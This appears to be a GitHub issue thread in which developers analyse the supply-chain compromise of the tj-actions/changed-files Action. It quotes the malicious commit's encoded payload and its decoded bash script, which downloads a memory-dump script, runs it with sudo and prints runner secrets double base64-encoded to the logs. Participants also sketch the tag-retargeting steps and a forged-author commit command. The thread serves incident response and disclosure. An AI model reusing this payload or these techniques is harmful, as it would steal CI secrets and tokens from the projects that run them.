Thanks for reporting this issue, don't forget to star this project if you haven't already to help us reach a wider audience.

Yep... this looks scary: 0e58ed8

edit: https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised/

@jackton1 for you awareness

It ultimately dumps memory to GHA logs, which can include GHA secrets:

from the malicious commit: 0e58ed8 introduced in:

• chore(deps): lock file maintenance #2460

async function updateFeatures(token) {
   
     const {stdout, stderr} = await exec.getExecOutput('bash', ['-c', `echo "aWYgW1sgIiRPU1RZUEUiID09ICJsaW51eC1nbnUiIF1dOyB0aGVuCiAgQjY0X0JMT0I9YGN1cmwgLXNTZiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25pa2l0YXN0dXBpbi8zMGU1MjViNzc2YzQwOWUwM2MyZDZmMzI4ZjI1NDk2NS9yYXcvbWVtZHVtcC5weSB8IHN1ZG8gcHl0aG9uMyB8IHRyIC1kICdcMCcgfCBncmVwIC1hb0UgJyJbXiJdKyI6XHsidmFsdWUiOiJbXiJdKiIsImlzU2VjcmV0Ijp0cnVlXH0nIHwgc29ydCAtdSB8IGJhc2U2NCAtdyAwIHwgYmFzZTY0IC13IDBgCiAgZWNobyAkQjY0X0JMT0IKZWxzZQogIGV4aXQgMApmaQo=" | base64 -d > /tmp/run.sh && bash /tmp/run.sh`], {
         ignoreReturnCode: true,
         silent: true
     });
     core.info(stdout);
     
 }

And if we base64 decode it:

echo "aWYgW1sgIiRPU1RZUEUiID09ICJsaW51eC1nbnUiIF1dOyB0aGVuCiAgQjY0X0JMT0I9YGN1cmwgLXNTZiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25pa2l0YXN0dXBpbi8zMGU1MjViNzc2YzQwOWUwM2MyZDZmMzI4ZjI1NDk2NS9yYXcvbWVtZHVtcC5weSB8IHN1ZG8gcHl0aG9uMyB8IHRyIC1kICdcMCcgfCBncmVwIC1hb0UgJyJbXiJdKyI6XHsidmFsdWUiOiJbXiJdKiIsImlzU2VjcmV0Ijp0cnVlXH0nIHwgc29ydCAtdSB8IGJhc2U2NCAtdyAwIHwgYmFzZTY0IC13IDBgCiAgZWNobyAkQjY0X0JMT0IKZWxzZQogIGV4aXQgMApmaQo=" | base64 -d 

if [[ "$OSTYPE" == "linux-gnu" ]]; then
  B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
  echo $B64_BLOB
else
  exit 0
fi

Is it possible that this fails if bash is not installed?

Is it possible that this fails if bash is not installed?

Yes, I started getting this error on my self-hosted Windows runners:

Error: Unable to locate executable file: bash. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.

Not sure if GitHub hosted Windows runners have bash installed.

@varunsh-coder did you already contact the email address in https://github.com/tj-actions/changed-files/security#public-vulnerability-disclosures?

@varunsh-coder did you already contact the email address in https://github.com/tj-actions/changed-files/security#public-vulnerability-disclosures?

Yes

Is it possible that this fails if bash is not installed?

Yes, I started getting this error on my self-hosted Windows runners:

Error: Unable to locate executable file: bash. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.

Not sure if GitHub hosted Windows runners have bash installed.

I noticed this in a similar scenario.

We even see some repositories using the backdoored commit by hash after updates by Renovate: https://github.com/search?q=0e58ed8671d6b60d0890c21b07f8835ace038e67&type=code

We even see some repositories using the backdoored commit by hash after updates by Renovate: github.com/search?q=0e58ed8671d6b60d0890c21b07f8835ace038e67&type=code

I've just confirmed that it is printing double base64 encoded secrets in runner job logs based on your link.

Here is one: https://github.com/szinn/k8s-homelab/actions/runs/13865435819/job/38803427088?pr=5353, double base64 --decode that output and boom, there is a github_token.

Every tag got pointed to this malicious commit:

https://github.com/tj-actions/changed-files/tags

I've just emailed security@github.com too with the title: "Urgent: Hundreds/Thousands of github_token secrets leaked" and linked to this issue. Because some action needs to be taken at the GitHub level to fix this and inform everyone.

@ElijahLynn I submitted a active malware report too

Makes me wonder if renovate is the one compromised?

I wouldn't jump to that assumption; I thought you could set your Git author name and email to anything you want, e.g.:

git -c user.name='renovate[bot]@users.noreply.github.com' -c user.email='renovate[bot]@users.noreply.github.com' commit -m "chore(deps): lock file maintenance (#2460)"

Haven't people done this to fake famous developers making commits in their repos?

@mceachen Re: renovate credentials: likely not. This commit was unsigned, while every other commit by Renovate in this repo is. Looks like a fake.

I think it's unlikely renovate[bot] was involved at all in committing this attack. Despite 0e58ed8's commit message, it was not actually introduced in #2460. The attacker probably just made their new commit look exactly like the last commit on main (9200e69) , which was actually by renovate[bot] (check its signature), to not look suspicious.

However, unfortunately the real renovate[bot] is continuing to do what it does best, which is updating people's repos to the latest versions of dependencies... which is why this needs to get resolved ASAP.

Is it possible that the memory dumper from https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py does not work in Docker containers?

When I run it in python:3-bookworm I get the following error:

root@2d9100eaf59e:/tmp# python /tmp/memdump.py
Traceback (most recent call last):
  File "/tmp/memdump.py", line 23, in <module>
    pid = get_pid()
  File "/tmp/memdump.py", line 19, in get_pid
    raise Exception('Can not get pid of Runner.Worker')
Exception: Can not get pid of Runner.Worker

@sarentz-tc It didn't output anything on our self-hosted runners. No error or secrets displayed.

@sarentz-tc It didn't output anything on our self-hosted runners. No error or secrets displayed.

Same. Ours are all in Docker. No VMs. I'm trying to see if that makes a difference. The error that I posted may be because the image I ran was not actually a runner image.

The offending commit 0e58ed8 was never pushed to this repository, as you can see by clicking the link, the commit belongs to a fork of the repository. If the attacker had some way of updating the tags and releases of this repository, then they could have accomplished this attack by:

1. Fork the repository
2. Push compromised code to the fork
3. Update the tags in the parent repository to point to the SHA of the fork

As the compromised commit was never pushed to the parent repository, it would not show in the Git logs.

Only the owner of this organization has the audit logs necessary to figure out how step 3 was accomplished. I hope a full investigation is done

@sarentz-tc It didn't output anything on our self-hosted runners. No error or secrets displayed.

Same. Ours are all in Docker. No VMs. I'm trying to see if that makes a difference. The error that I posted may be because the image I ran was not actually a runner image.

Confirming that the memdump.py script works inside Docker based GitHub runners.

The offending commit 0e58ed8 was never pushed to this repository, as you can see by clicking the link, the commit belongs to a fork of the repository. If the attacker had some way of updating the tags and releases of this repository, then they could have accomplished this attack by:

1. Fork the repository
2. Push compromised code to the fork
3. Update the tags in the parent repository to point to the SHA of the fork

As the compromised commit was never pushed to the parent repository, it would not show in the Git logs.

Only the owner of this organization has the audit logs necessary to figure out how step 3 was accomplished. I hope a full investigation is done

Wait is that true though? How is that possible to have a tag reference a fork's commit? I see this discussion and they say it's a misleading message but 🤷 https://github.com/orgs/community/discussions/19021 . Anyone know more if thats even possible?